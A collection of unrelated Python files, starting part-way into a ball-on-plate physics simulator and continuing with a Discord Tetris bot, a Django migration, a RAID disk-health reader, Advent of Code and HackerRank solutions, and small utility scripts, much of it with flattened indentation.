# accel = (mass * g * theta) / (mass + inertia / radius^2)
        # (y_theta and x_theta are intentionally swapped here.)
theta = Vector3([y_theta, -x_theta, 0])
self.ball_acc = (
theta
/ (self.ball_mass + self._ball_inertia() / (self.ball_radius ** 2))
* self.ball_mass
* self.gravity
)
# get contact displacement
disp, vel = self._motion_for_time(self.ball_vel, self.ball_acc, step_t)
# simplified ball mechanics against a plane
self.ball.x += disp.x
self.ball.y += disp.y
self._update_ball_z()
self.ball_vel = vel
# For rotation on plate motion we use infinite friction and
# perfect ball / plate coupling.
# Calculate the distance we traveled across the plate during
# this time slice.
rot_distance = math.hypot(disp.x, disp.y)
if rot_distance > 0:
# Calculate the fraction of the circumference that we traveled
# (in radians).
rot_angle = rot_distance / self.ball_radius
# Create a quaternion that represents the delta rotation for this time period.
# Note that we translate the (x, y) direction into (y, -x) because we're
# creating a vector that represents the axis of rotation which is normal
# to the direction the ball traveled in the x/y plane.
rot_q = quaternion.normalize(
np.array(
[
disp.y / rot_distance * math.sin(rot_angle / 2.0),
-disp.x / rot_distance * math.sin(rot_angle / 2.0),
0.0,
math.cos(rot_angle / 2.0),
]
)
)
old_rot = self.ball_qat.xyzw
new_rot = quaternion.cross(quat1=old_rot, quat2=rot_q)
self.ball_qat.xyzw = quaternion.normalize(new_rot)
return 0.0
def plate_to_world(self, x: float, y: float, z: float) -> Vector3:
# rotate
x_rot = matrix44.create_from_axis_rotation([1.0, 0.0, 0.0], self.plate_theta_x)
y_rot = matrix44.create_from_axis_rotation([0.0, 1.0, 0.0], self.plate_theta_y)
vec = matrix44.apply_to_vector(mat=x_rot, vec=[x, y, z])
vec = matrix44.apply_to_vector(mat=y_rot, vec=vec)
# translate
move = matrix44.create_from_translation(
[self.plate.x, self.plate.y, self.plate.z + PLATE_ORIGIN_TO_SURFACE_OFFSET]
)
vec = matrix44.apply_to_vector(mat=move, vec=vec)
return Vector3(vec)
def world_to_plate(self, x: float, y: float, z: float) -> Vector3:
move = matrix44.create_from_translation(
[
-self.plate.x,
-self.plate.y,
-(self.plate.z + PLATE_ORIGIN_TO_SURFACE_OFFSET),
]
)
vec = matrix44.apply_to_vector(mat=move, vec=[x, y, z])
# rotate
x_rot = matrix44.create_from_axis_rotation([1.0, 0.0, 0.0], -self.plate_theta_x)
y_rot = matrix44.create_from_axis_rotation([0.0, 1.0, 0.0], -self.plate_theta_y)
vec = matrix44.apply_to_vector(mat=x_rot, vec=vec)
vec = matrix44.apply_to_vector(mat=y_rot, vec=vec)
return Vector3(vec)
def set_initial_ball(self, x: float, y: float, z: float):
self.ball.xyz = [x, y, z]
self._update_ball_z()
# Set initial observations
self._update_estimated_ball(self.ball)
def update_ball(self, ball_reset: bool = False):
"""
Update the ball position with the physics model.
"""
if ball_reset:
# this just ensures that the ball is on the plate
self._update_ball_z()
else:
self._ball_plate_contact(self.step_time)
# Finally, lets make some approximations for observations
self._update_estimated_ball(self.ball)
def state(self) -> Dict[str, float]:
# x_theta, y_theta = self._xy_theta_from_nor(self.plate_nor)
plate_nor = self._plate_nor()
return dict(
# reflected input controls
roll=self.roll,
pitch=self.pitch,
height_z=self.height_z,
# reflected constants
time_delta=self.time_delta,
jitter=self.jitter,
step_time=self.step_time,
elapsed_time=self.elapsed_time,
gravity=self.gravity,
plate_radius=self.plate_radius,
plate_theta_vel_limit=self.plate_theta_vel_limit,
plate_theta_acc=self.plate_theta_acc,
plate_theta_limit=self.plate_theta_limit,
plate_z_limit=self.plate_z_limit,
ball_mass=self.ball_mass,
ball_radius=self.ball_radius,
ball_shell=self.ball_shell,
obstacle_radius=self.obstacle_radius,
obstacle_x=self.obstacle_x,
obstacle_y=self.obstacle_y,
target_x=self.target_x,
target_y=self.target_y,
# modelled plate metrics
plate_x=self.plate.x,
plate_y=self.plate.y,
plate_z=self.plate.z,
plate_nor_x=plate_nor.x,
plate_nor_y=plate_nor.y,
plate_nor_z=plate_nor.z,
plate_theta_x=self.plate_theta_x,
plate_theta_y=self.plate_theta_y,
plate_theta_vel_x=self.plate_theta_vel_x,
plate_theta_vel_y=self.plate_theta_vel_y,
plate_vel_z=self.plate_vel_z,
# modelled ball metrics
ball_x=self.ball.x,
ball_y=self.ball.y,
ball_z=self.ball.z,
ball_vel_x=self.ball_vel.x,
ball_vel_y=self.ball_vel.y,
ball_vel_z=self.ball_vel.z,
ball_qat_x=self.ball_qat.x,
ball_qat_y=self.ball_qat.y,
ball_qat_z=self.ball_qat.z,
ball_qat_w=self.ball_qat.w,
ball_on_plate_x=self.ball_on_plate.x,
ball_on_plate_y=self.ball_on_plate.y,
obstacle_distance=self.obstacle_distance,
obstacle_direction=self.obstacle_direction,
# modelled camera observations
estimated_x=self.estimated_x,
estimated_y=self.estimated_y,
estimated_radius=self.estimated_radius,
estimated_vel_x=self.estimated_vel_x,
estimated_vel_y=self.estimated_vel_y,
# modelled positions and velocities
estimated_speed=self.estimated_speed,
estimated_direction=self.estimated_direction,
estimated_distance=self.estimated_distance,
ball_noise=self.ball_noise,
plate_noise=self.plate_noise,
# meta vars
ball_fell_off=1 if self.halted() else 0,
iteration_count=self.iteration_count,
)
|
class NoPrivateKeyException(Exception):
def __init__(self):
        super(NoPrivateKeyException, self).__init__("Please provide a private key before getting contents.")
|
import asyncio
import config
from forumsweats import db
import time
from typing import Any, Dict, List, Literal, Union
from forumsweats.commandparser import Context
import discord
import random
name = 'tetris'
aliases = ['tetris']
pieces = [
{
# I piece
'color': '🟦',
'ghost_color': '🔵',
'shape': [
[1, 1, 1, 1]
]
},
{
# J piece
'color': '🟫',
'ghost_color': '🟤',
'shape': [
[1, 0, 0],
[1, 1, 1]
]
},
{
# L piece
'color': '🟧',
'ghost_color': '🟠',
'shape': [
[0, 0, 1],
[1, 1, 1]
]
},
{
# O piece
'color': '🟨',
'ghost_color': '🟡',
'shape': [
[1, 1],
[1, 1]
]
},
{
# S piece
'color': '🟩',
'ghost_color': '🟢',
'shape': [
[0, 1, 1],
[1, 1, 0]
]
},
{
# T piece
'color': '🟪',
'ghost_color': '🟣',
'shape': [
[0, 1, 0],
[1, 1, 1]
]
},
{
# Z piece
'color': '🟥',
'ghost_color': '🔴',
'shape': [
[1, 1, 0],
[0, 1, 1]
]
}
]
background_color = '⬛'
board_width = 10
# board_height = 20
board_height = 19 # discord limits the number of emojis a message can have to 199
default_board = [
	# build each column as its own list; writing `[...] * board_width` would
	# make every column alias the same inner list object
	[ background_color ] * board_height
	for _ in range(board_width)
]
active_channels = []
def is_position_possible(game_board, shape: List[List[Literal[0, 1]]], x: int, y: int):
'Check if the piece can be at a given position'
for relative_y, row in enumerate(shape):
for relative_x, cell in enumerate(row):
if cell:
if x + relative_x < 0 or x + relative_x >= board_width:
return False
if y + relative_y < 0 or y + relative_y >= board_height:
return False
if game_board[x + relative_x][y + relative_y] != background_color:
return False
return True
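# A quick sanity check (using the module's own constants): on an empty board
# the I piece fits at the origin, but not so far right that it leaves the board:
#
#   is_position_possible(default_board, [[1, 1, 1, 1]], 0, 0)                # True
#   is_position_possible(default_board, [[1, 1, 1, 1]], board_width - 1, 0)  # False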
def render_board_embed(original_game_board, score: int, held_piece=None, piece=None, piece_x: Union[int, None] = None, piece_y: Union[int, None] = None):
'Create an embed for the Tetris board'
# copy the board so we don't modify the original
game_board = [ row[:] for row in original_game_board ]
if piece and piece_x is not None and piece_y is not None:
# overlay the piece onto the game board
game_board = overlay_piece_onto_board(game_board, piece, piece_x, piece_y)
# overlay the ghost, which is always at the place where the piece would be if it drops
ghost_piece = { 'color': piece['ghost_color'], 'shape': piece['shape'] }
ghost_piece_y = piece_y
while is_position_possible(original_game_board, ghost_piece['shape'], piece_x, ghost_piece_y + 1):
ghost_piece_y += 1
game_board = overlay_piece_onto_board(game_board, ghost_piece, piece_x, ghost_piece_y)
board_render = ''
for y in range(len(game_board[0])):
for x in range(len(game_board)):
board_render += game_board[x][y]
		board_render += '\n'
embed = discord.Embed(
title = f'Tetris (score: {score:,})',
description = board_render,
colour = discord.Colour.blue(),
)
if held_piece:
held_piece_render = ''
for x in range(len(held_piece['shape'])):
for y in range(len(held_piece['shape'][0])):
held_piece_render += held_piece['color'] if held_piece['shape'][x][y] else background_color
held_piece_render += '\n'
embed.add_field(
name = 'Holding Piece',
value = held_piece_render
)
return embed
def overlay_piece_onto_board(game_board, piece, piece_x, piece_y):
'Overlay the piece onto the board'
for y, row in enumerate(piece['shape']):
for x, cell in enumerate(row):
if cell and game_board[piece_x + x][piece_y + y] == background_color:
game_board[piece_x + x][piece_y + y] = piece['color']
return game_board
def rotate_shape_clockwise(shape):
'Rotate the shape clockwise'
# copy the shape so we don't modify the original
shape = [ list(row) for row in shape ]
return [ [ shape[y][x] for y in range(len(shape)-1, -1, -1) ] for x in range(len(shape[0])) ]
def rotate_shape_counterclockwise(shape):
'Rotate the shape counterclockwise'
# copy the shape so we don't modify the original
shape = [ list(row) for row in shape ]
return [ [ shape[y][x] for y in range(len(shape)) ] for x in range(len(shape[0])-1, -1, -1) ]
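# A minimal REPL sketch of the rotation helpers, using the T piece's shape:
#
#   >>> rotate_shape_clockwise([[0, 1, 0],
#   ...                         [1, 1, 1]])
#   [[1, 0], [1, 1], [1, 0]]
#   >>> rotate_shape_counterclockwise([[0, 1, 0],
#   ...                                [1, 1, 1]])
#   [[0, 1], [1, 1], [0, 1]]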
async def run(message: Context):
'Play Tetris in Discord'
if not await db.has_shop_item(message.author.id, 'tetris'):
return await message.send(f'You need to buy tetris from {config.prefix}shop.')
if message.channel.id in active_channels:
return await message.reply('There\'s already a game of Tetris going on in this channel, please wait for it to end.')
active_channels.append(message.channel.id)
# the game board, this doesn't include the current piece that is moving
game_board = [ row[:] for row in default_board ]
view = discord.ui.View(timeout=None)
ui_button_left = discord.ui.Button(
custom_id='left',
style=discord.ButtonStyle.primary,
emoji='◀️',
row=1
)
view.add_item(ui_button_left)
ui_button_drop = discord.ui.Button(
custom_id='drop',
style=discord.ButtonStyle.success,
emoji='⏬',
row=1
)
view.add_item(ui_button_drop)
ui_button_right = discord.ui.Button(
custom_id='right',
style=discord.ButtonStyle.primary,
emoji='▶️',
row=1
)
view.add_item(ui_button_right)
ui_button_spin_counterclockwise = discord.ui.Button(
custom_id='spin_counterclockwise',
style=discord.ButtonStyle.secondary,
emoji='🔄',
row=2
)
view.add_item(ui_button_spin_counterclockwise)
ui_button_down = discord.ui.Button(
custom_id='down',
style=discord.ButtonStyle.primary,
emoji='🔽',
row=2
)
view.add_item(ui_button_down)
ui_button_spin_clockwise = discord.ui.Button(
custom_id='spin_clockwise',
style=discord.ButtonStyle.secondary,
emoji='🔃',
row=2
)
view.add_item(ui_button_spin_clockwise)
ui_button_hold = discord.ui.Button(
custom_id='hold',
style=discord.ButtonStyle.secondary,
emoji='♻️',
row=3
)
view.add_item(ui_button_hold)
game_message = await message.reply(
embed = render_board_embed(game_board, 0),
view = view
)
# whether the game hasn't ended
playing = True
# the current piece
	piece: Union[Dict[str, Any], None] = None
piece_x = 0
piece_y = 0
held_piece = None
last_edit = time.time()
bag = []
score = 0
has_held_this_round = False
# whether nothing will move down this round
frozen_turn = False
def choose_piece():
'Choose a random piece to play'
nonlocal bag
# https://tetris.fandom.com/wiki/Random_Generator
if not bag:
			bag = list(pieces)
random.shuffle(bag)
return bag.pop()
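	# With the 7-bag generator above every piece appears exactly once per seven
	# drops, so the longest possible wait between two copies of the same piece
	# is 12 drops (first out of one bag, then last out of the next).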
	def choose_new_piece(new_piece: Union[Dict[str, Any], None] = None):
'Choose a new piece to place'
nonlocal piece
nonlocal piece_x
nonlocal piece_y
piece = new_piece or choose_piece()
piece_x = int(board_width / 2 - len(piece['shape'][0]) / 2)
piece_y = 0
async def on_interact(interaction: discord.interactions.Interaction):
# this prevents other people from interacting with the game
return interaction.user == message.author
async def button_click_left(interaction: discord.interactions.Interaction):
nonlocal piece_x
nonlocal piece_y
nonlocal piece
if piece and is_position_possible(game_board, piece['shape'], piece_x - 1, piece_y):
piece_x -= 1
async def button_click_right(interaction: discord.interactions.Interaction):
nonlocal piece_x
nonlocal piece_y
nonlocal piece
if piece and is_position_possible(game_board, piece['shape'], piece_x + 1, piece_y):
piece_x += 1
async def button_click_spin_clockwise(interaction: discord.interactions.Interaction):
nonlocal piece_x
nonlocal piece_y
nonlocal piece
if not piece: return
new_shape = rotate_shape_clockwise(piece['shape'])
if is_position_possible(game_board, new_shape, piece_x, piece_y):
piece['shape'] = new_shape
async def button_click_spin_counterclockwise(interaction: discord.interactions.Interaction):
nonlocal piece_x
nonlocal piece_y
nonlocal piece
if not piece: return
new_shape = rotate_shape_counterclockwise(piece['shape'])
if is_position_possible(game_board, new_shape, piece_x, piece_y):
piece['shape'] = new_shape
async def button_click_down(interaction: discord.interactions.Interaction):
nonlocal piece_x
nonlocal piece_y
nonlocal piece
nonlocal score
if piece and is_position_possible(game_board, piece['shape'], piece_x, piece_y + 1):
piece_y += 1
score += 1
async def button_click_drop(interaction: discord.interactions.Interaction):
nonlocal piece_x
nonlocal piece_y
nonlocal piece
nonlocal score
while piece and is_position_possible(game_board, piece['shape'], piece_x, piece_y + 1):
piece_y += 1
score += 2
async def button_click_hold(interaction: discord.interactions.Interaction):
nonlocal piece_x
nonlocal piece_y
nonlocal piece
nonlocal held_piece
		nonlocal has_held_this_round
		# frozen_turn must be declared nonlocal, otherwise the assignment at the
		# end of this callback creates a local variable and has no effect
		nonlocal frozen_turn
if has_held_this_round:
return
has_held_this_round = True
if held_piece is None:
held_piece = piece
choose_new_piece()
else:
piece, held_piece = held_piece, piece
choose_new_piece(piece)
frozen_turn = True
def clear_lines():
'Clear any full lines and award points'
nonlocal game_board
nonlocal score
nonlocal bag
		lines_cleared = 0
		y = board_height - 1
		while y >= 0:
			if all(column[y] != background_color for column in game_board):
				# the line is full: remove cell y from every column
				for x in range(board_width):
					game_board[x].pop(y)
				# then push a background cell onto the top of each column,
				# shifting everything above the cleared line down by one;
				# y is left unchanged so the row that dropped into this
				# index is checked on the next iteration
				for x in range(board_width):
					game_board[x].insert(0, background_color)
				lines_cleared += 1
			else:
				y -= 1
if lines_cleared == 1:
score += 100
elif lines_cleared == 2:
score += 300
elif lines_cleared == 3:
score += 500
elif lines_cleared == 4:
score += 800
view.interaction_check = on_interact
ui_button_left.callback = button_click_left
ui_button_right.callback = button_click_right
ui_button_spin_clockwise.callback = button_click_spin_clockwise
ui_button_spin_counterclockwise.callback = button_click_spin_counterclockwise
ui_button_down.callback = button_click_down
ui_button_drop.callback = button_click_drop
ui_button_hold.callback = button_click_hold
choose_new_piece()
while playing:
try:
# do the game loop
last_edit = time.time()
if piece:
await game_message.edit(
embed = render_board_embed(game_board, score, held_piece, piece, piece_x, piece_y)
)
else:
await game_message.edit(
embed = render_board_embed(game_board, score, held_piece)
)
choose_new_piece()
frozen_turn = True
if piece and not is_position_possible(game_board, piece['shape'], piece_x, piece_y):
playing = False
			# wait one second plus however long the message edit took before the next tick
			await asyncio.sleep(time.time() - last_edit + 1)
if piece and is_position_possible(game_board, piece['shape'], piece_x, piece_y + 1):
if frozen_turn:
frozen_turn = False
else:
piece_y += 1
else:
# the piece can't be moved down anymore, choose a new piece
game_board = overlay_piece_onto_board(game_board, piece, piece_x, piece_y)
piece = None
clear_lines()
has_held_this_round = False
		except Exception:
			# message edits can fail transiently (e.g. Discord rate limits);
			# back off briefly and retry on the next loop iteration
			await asyncio.sleep(1)
embed = render_board_embed(game_board, score, held_piece)
embed.title = f'Game over (score: {score:,})'
await game_message.edit(embed = embed)
view.stop()
active_channels.remove(message.channel.id)
|
# Generated by Django 3.0.5 on 2020-05-14 15:18
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('investment_tracker', '0004_auto_20200514_1518'),
]
operations = [
migrations.RunSQL(
"""UPDATE investment_tracker_accountshares
SET peak_pct_of_balance = 1/pct_of_peak;"""),
migrations.RunSQL(
"""UPDATE investment_tracker_accountshares
SET trough_pct_of_balance = 1/pct_of_trough
WHERE pct_of_trough is not NULL;"""),
]
|
#!/usr/bin/env python3
import subprocess as sp
import os
import json
STORCLI_EXEC = "/opt/MegaRAID/storcli/storcli64"
if not os.path.exists(STORCLI_EXEC):
STORCLI_EXEC = "storcli"
class StorCliBase:
def __init__(self):
# self check
output = self.run(["/c0", "show", "nolog"])
status = output['Controllers'][0]['Command Status']['Status']
if status != 'Success':
raise RuntimeError("Self-check failed. Did you run this script with root? (Controller status gets {} rather than 'Success')".format(status))
def run(self, args: list):
# Get JSON output
ret = sp.run([STORCLI_EXEC, *args, "J"], stdout=sp.PIPE)
if ret.returncode != 0:
raise RuntimeError("storcli returns a non-zero value.")
return json.loads(ret.stdout)
def get_physical_disk_info(self):
return self.run(['/call', '/eall', '/sall', 'show', 'all', 'nolog'])
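    # In storcli syntax /call, /eall and /sall address every controller,
    # enclosure and slot respectively, so this single call returns the
    # detailed state of every physical drive on the machine.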
storcli = StorCliBase()
def update_dict(d, key, value_dict):
    # merge value_dict into d[key], creating the entry if it does not exist
    if key not in d:
        d[key] = value_dict
    else:
        d[key].update(value_dict)
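# A minimal sketch of update_dict's merge semantics (hypothetical values):
#
#   info = {}
#   update_dict(info, 'Drive /c0/e252/s0', {'media_error': 0})
#   update_dict(info, 'Drive /c0/e252/s0', {'firmware': 'Onln, Spin Up'})
#   # info == {'Drive /c0/e252/s0': {'media_error': 0, 'firmware': 'Onln, Spin Up'}}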
def get_disk_errors():
pdinfo = storcli.get_physical_disk_info()['Controllers']
info = {}
for adapter in pdinfo:
adapter_id = adapter['Command Status']['Controller']
adapter_info = {}
adapter_response = adapter['Response Data']
for key in adapter_response:
if 'Detailed Information' in key:
disk = key.split("-")[0].strip()
state = adapter_response[key][disk + " State"]
media_error = int(state['Media Error Count'])
other_error = int(state['Other Error Count'])
predictive_failure = int(state['Predictive Failure Count'])
smart = state["S.M.A.R.T alert flagged by drive"]
update_dict(adapter_info, disk, {
'media_error': media_error,
'other_error': other_error,
'predictive_failure': predictive_failure,
'smart_alert': smart,
})
else:
                drive_info = adapter_response[key][0]  # storcli wraps each drive's summary in a single-element list
state = drive_info['State']
spin = drive_info['Sp']
firmware_state = "{state}, Spin {spin}".format(state=state, spin='Up' if spin == 'U' else 'Down')
update_dict(adapter_info, key, {
'firmware': firmware_state,
})
info[adapter_id] = adapter_info
return info
if __name__ == '__main__':
print(get_disk_errors())
# Return example:
# {0: {'Drive /c0/e252/s0': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c0/e252/s1': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c0/e252/s4': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c0/e252/s5': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c0/e252/s6': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c0/e252/s7': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}}, 1: {'Drive /c1/e252/s0': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c1/e252/s1': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c1/e252/s2': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c1/e252/s3': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c1/e252/s4': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c1/e252/s5': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}, 'Drive /c1/e252/s6': {'firmware': 'Onln, Spin Up', 'media_error': 0, 'other_error': 0, 'predictive_failure': 0, 'smart_alert': 'No'}}}
|
import logging
# '%(lineno)d' is the standard LogRecord attribute; '%(clineno)d' does not
# exist and would make every logging call raise a formatting error
formatter = logging.Formatter('%(lineno)d: %(message)s')
fileHandler = logging.FileHandler('misc/output/test06.log', 'w')
fileHandler.setFormatter(formatter)
logger01 = logging.getLogger('test')
logger01.addHandler(fileHandler)
logger01.setLevel(logging.DEBUG)
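# A short usage sketch: with the '%(lineno)d' attribute each record is
# prefixed with the line number of the logging call, e.g.
#
#   logger01.debug('hello')   # appends a line like '10: hello' to the log file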
|
from earthscipy.wells import *
from wells_example_data import Create_WellField_North, Create_WellField_South
WF_N = Create_WellField_North()
WF_S = Create_WellField_South()
print('\nprint out the list of wells')
for wf in [ WF_N, WF_S, ]:
print( "\nField", wf.field_name )
for i in wf.Well_list:
print( '\nWell', i.wellname )
		print( 'wellhead X %+5d Y %+5d Z %+5d well_length %d' % ( i.wellhead.X, i.wellhead.Y, i.wellhead.Z, i.well_length ) )
print('\nprint out the geometry data for well', i.wellname )
for s in i.geometry:
print( 'Inclination %.1f tangent %.1f vertical %.1f. Start length %.1f. End point X Y Z (%.1f, %.1f, %.1f)' % ( s.inclination, s.tangent, s.vertical, s.start_length, s.end_dot.X, s.end_dot.Y, s.end_dot.Z ) )
	print( '\nfield size top (X %d Y %d Z %d) bottom (X %d Y %d Z %d)' % ( wf.topleft.X, wf.topleft.Y, wf.topleft.Z, wf.bottomright.X, wf.bottomright.Y, wf.bottomright.Z ) )
print("\nEnd")
|
def get_input(filename):
max_x = 0
max_y = 0
with open(filename, "r") as f:
for line in f.readlines():
line = line.strip()
if line == "":
break
x, y = line.split(",")
x = int(x)
y = int(y)
if x > max_x:
max_x = x
if y > max_y:
max_y = y
reading_folds = False
folds = []
    paper = [["." for _ in range(max_x + 1)] for _ in range(max_y + 1)]
with open(filename, "r") as f:
for line in f.readlines():
line = line.strip()
if line == "":
reading_folds = True
continue
if not reading_folds:
x, y = line.split(",")
paper[int(y)][int(x)] = "#"
else:
folds.append(line.split(" ")[-1])
return paper, folds
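# The input file is assumed to follow the Advent of Code 2021 day 13 format:
# dot coordinates, a blank line, then the fold instructions, e.g.
#
#   6,10
#   0,14
#
#   fold along y=7
#   fold along x=5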
def do_folds(paper, folds, fold_count=None):
count = 0
for fold in folds:
axis = fold[0]
loc = int(fold.split("=")[-1])
if axis == "y":
for y in range(loc + 1, len(paper)):
for x in range(len(paper[0])):
if paper[y][x] == "#":
paper[y][x] = "."
offset = (y - loc) * 2
paper[y-offset][x] = "#"
paper = paper[:loc]
elif axis == "x":
for y in range(len(paper)):
for x in range(loc + 1, len(paper[0])):
if paper[y][x] == "#":
paper[y][x] = "."
offset = (x - loc) * 2
paper[y][x-offset] = "#"
for y in range(len(paper)):
paper[y] = paper[y][:loc]
count += 1
if fold_count and count == fold_count:
return paper
return paper
def count_dots(paper):
dots = 0
for y in range(len(paper)):
for x in range(len(paper[0])):
if paper[y][x] == "#":
dots += 1
return dots
def main():
paper, folds = get_input("input")
paper = do_folds(paper, folds, 1)
dots = count_dots(paper)
print("Part 1:")
print(f"{dots} dots are visible after one fold")
print()
paper, folds = get_input("input")
paper = do_folds(paper, folds)
print("Part 2:")
# this makes it more visible on my terminal
for y in range(len(paper)):
for x in range(len(paper[0])):
if paper[y][x] == "#":
print(" X ", end="")
else:
print(" ", end="")
print()
if __name__ == "__main__":
main()
|
""" Problem: Python If-Else || Task:
Given an integer, n, perform the following conditional actions:
1. If n is odd, print Weird
2. If n is even and in the inclusive range of 2 to 5, print Not Weird
3. If n is even and in the inclusive range of 6 to 20, print Weird
4. If n is even and greater than 20, print Not Weird
"""
N = int(input())
if N % 2 != 0:
print("Weird")
else:
    if N in range(2, 6):
        print("Not Weird")
    elif N in range(6, 21):
        print("Weird")
    elif N > 20:
        print("Not Weird")
|